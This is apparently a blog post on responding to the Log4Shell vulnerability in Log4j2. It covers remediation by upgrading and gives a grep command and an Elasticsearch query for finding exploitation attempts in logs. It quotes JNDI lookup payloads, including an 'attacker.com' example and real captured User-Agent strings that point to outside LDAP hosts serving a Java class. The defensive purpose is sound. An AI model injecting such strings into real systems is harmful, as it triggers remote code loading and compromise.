Loading...

log4shell

Used:   elasticsearch 7.16.1 

A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j2 utility was disclosed publicly via the project’s GitHub on December 9, 2021.

Log4j2 is an open-source Java logging library developed by the Apache Foundation. Log4j2 is widely used in many applications and is a component, used in many services and products.

Since last Friday (2021-12-10) CVE-2021-44228 has hit the IT industry very hard.

The vulnerability allows for unauthenticated remote code execution, hence the name log4shell.

Impact

For non-Java users, this vulnerability has no impact. Attempts on static pages or other servers like PHP, IIS will fail.

If you have Java-based software, you are prone to this vulnerability and should check if log4j or log4j2 is in usage.

This zero-day exploit is a severe threat and needs to be dealt with immediately. For Operations and Application Development it is a necessary task.

While other safeguards are in place, like no internet connectivity and firewall rules, resolving is a must. You don’t want to risk exposure from inside your network either. The first priority is services in front or expose to the internet need to be remedied.

Follow the proposed mitigation and remediation for your software and infrastructure.

For instance Elastic announced its impact and proposals.

That led to urgent hotfixes and immediate action.

Analysis

The first step is to identify the components using log4j2.

Project Analysis

Typical files to inspect

  • pom.xml ⇒ Apache Maven
  • build.gradle, gradle.properties ⇒ Gradle

And the respective configuration files are written in properties, JSON, yaml and XML format.

  • log4j2.properties, log4j2.js(o)n, log4j2.y(a)ml, log4j2.xml
  • log4j2-test.properties, log4j2-test.js(o)n, log4j2-test.y(a)ml, log4j2-test.xml

Remediation: Upgrade to the latest Version 2.16.0 as announced from the Apache Foundation

The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.15.0. Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution. Log4j now limits the protocols by default to only java, ldap, and ldaps and limits the ldap protocols to only accessing Java primitive objects by default served on the localhost. One vector that allowed exposure to this vulnerability was Log4j’s allowance of Lookups to appear in log messages. As of Log4j 2.15.0, this feature is now disabled by default. While an option has been provided to enable Lookups in this fashion, users are strongly discouraged from enabling it.

The first fix was incomplete, as of late 13th December Version 2.16.0 was released.

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default.

Source: https://logging.apache.org/log4j/2.x/

Log Analysis

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The Elastic Security Blog shared a useful gist for a series of checks.

This command searches for exploitation attempts in uncompressed files in folder /var/log and all subfolders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

If you have stored your logs in Elasticsearch itself, the following query list all indices that contain found messages against the search patterns. The query is used in the Kibana Dev Console and be translated to curl. Search patterns can or should be extended, as we take the above grep command as a basis.

At this point you could just search for ${, as attackers switch to obfuscation and the final string being evaluated to jndi:ldap. To demonstrate a quick search in Elasticsearch.

GET _search
{
  "size": 0,
  "query": {
    "bool": {
      "must": [
        {
          "bool": {
            "should": [
              {
                "simple_query_string": {
                  "query": "jndi:ldap",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:ldaps",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:rmi",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:dns",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:nis",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:iiop",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:corba",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:nds",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:http",
                  "fields": []
                }
              }
            ]
          }
        }
      ]
    }
  },
  "aggs": {
    "applications": {
      "terms": {
        "field": "_index"
      }
    }
  }
}

This example is from our production logs. In comparison, if you search only for ldap and ldaps the amount of found docs is less. So check against all the above protocols. In the key field, you have the name of the indices, which contains the found messages. The doc_count reflects the total amount of the messages. For safety reasons index names have been replaced.

{ 
  "aggregations" : {
    "applications" : {
      "doc_count_error_upper_bound" : 0,
      "sum_other_doc_count" : 0,
      "buckets" : [
        {
          "key" : "le-mapper-test-2021.12",
          "doc_count" : 225
        },
        {
          "key" : "le-mapper-prod-2021.12",
          "doc_count" : 204
        },
        {
          "key" : "security-2021.12.11",
          "doc_count" : 4
        }
      ]
    }
  }
}

The good news the attacks (12th December, Sunday) were made after the publishing of the exploit (10th December, Friday), while all systems have been remedied.

How does an attack look like? Lunasec provides examples.

The attacker set their User-Agent header to: ${jndi:ldap://attacker.com/a}.

And that is exactly what we found in our logs, some examples (truncated).

"useragent" : "${jndi:ldap://foo.6k7te5so4.bar.interactsh.com/ua}"
"useragent" : "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko,+${jndi:ldap://replaced.y.psc4fuel.com/KieFO.class})+Chrome/93.0.4577.63+Safari/537.36"

Last example will attempt to "requestedUrl" : "/${jndi:ldap://replaced.y.psc4fuel.com/KieFO.class}".

Founding the attempts, were especially insightful and rewarding as we took all necessary steps to prevent exploitations. Furthermore, we have the respective IP addresses logged and can inspect and ban or block those.

Conclusion

Check your affected systems immediately and roll out your hotfixes!

  • Upgrade log4j2 to Version 2.16.0 or later!
  • Check the vendor/product proposals to mitigate or remediate the situation, e.g. upgrading Logstash (7.16.1 released on 13th December) or Docker

If you need a lot of time for that, that is an indicator for a mandatory change within your organisation.

It was a pleasant disruption of my regular work and thanks to the Open Source community it was quickly dealt with.

Please remember the terms for blog comments.